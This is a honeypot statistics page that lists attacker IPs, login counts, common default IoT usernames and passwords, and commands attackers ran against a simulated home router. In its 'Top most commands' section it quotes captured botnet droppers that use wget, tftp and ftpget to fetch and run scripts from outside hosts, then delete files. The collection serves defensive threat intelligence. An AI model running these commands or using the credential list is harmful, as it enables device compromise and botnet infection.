Honeypot Telnet

This page is updated daily. Last update: 2018-10-19 22:09:01 UTC

The followings Telnet blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
The honeypot simulates a home router with a weak password and the most usual commands.
Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Other informations

All passwords order by length (txt)
HTTP urls collected (txt)
Monthly connections (txt)

Statistics - 2018

Unique IP address22442
Unique username612
Unique password1442

Latest commands executed

Timestamp Command IP address AS AS Org Country
2018-10-19enableÍsystemÍ37.6.88.2325472WIND-AS, GRGR
2018-10-19enableÍsystemÍ37.6.88.2325472WIND-AS, GRGR
2018-10-19enableÍsystemÍ37.6.88.2325472WIND-AS, GRGR
2018-10-19enable23.242.108.22820001ROADRUNNER-WEST Time Warn...US
2018-10-19enable163.53.83.9545433KISPL-AS-IN Kappa Interne...IN
2018-10-19enable176.50.208.12412389ROSTELECOM-AS, RURU
2018-10-19enable176.50.208.12412389ROSTELECOM-AS, RURU
2018-10-19enable176.50.208.12412389ROSTELECOM-AS, RURU
2018-10-19enable176.50.208.12412389ROSTELECOM-AS, RURU
2018-10-19enable95.237.7.943269ASN-IBSNAZ, ITIT

Top most sessions per distinct IP address - 2018

IP Address AS AS Org Country
185.12.179.208 (virustotal) (dnsbl-check)200185XANDMAIL-ASN, DEDE
205.185.117.65 (virustotal) (dnsbl-check)53667PONYNET FranTech Solutions, USUS
46.101.36.85 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
94.177.248.67 (virustotal) (dnsbl-check)199883ARUBACLOUDLTD-ASN, GBUNK
188.166.119.55 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USNL
62.211.128.95 (virustotal) (dnsbl-check)3269ASN-IBSNAZ, ITIT
159.89.123.246 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USUNK
178.62.71.53 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
171.221.218.100 (virustotal) (dnsbl-check)4134CHINANET-BACKBONE No.31,J...CN
79.41.72.16 (virustotal) (dnsbl-check)3269ASN-IBSNAZ, ITIT

Login attempts last 10 days

Date Occurrences
2018-10-191818
2018-10-181522
2018-10-171875
2018-10-161848
2018-10-152233
2018-10-142676
2018-10-132443
2018-10-122435
2018-10-112056
2018-10-101841

Top username - 2018

Username
root
shell
enable
admin
default
guest
user
support
supervisor
Administrator

Top password - 2018

Password
sh
system
admin
default
12345
1234
password
bin
user
aquario

Top username/password - 2018

Username / Password
shell / sh
enable / system
root / vizxv
admin / admin
root / default
root / aquario
support / support
user / user
root / xc3511
root / anko

Top most commands - 2018

Command
enable
enable
linuxsh
/bin/busybox wget http://fun.r00ts.ninja/bins/arm -O - > scanHA; /bin/busybox chmod 777 scanHA; ./scanHA telnet.scanner; /bin/busybox SORA
sh
sh\r\nshell\r\nenable\r\nlinuxshell\r\nsystem
start
PAYLOADZZZZ
ping 127.0.0.1 -c1 && sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.237.179/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 89.34.237.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.34.237.179; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.34.237.179 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes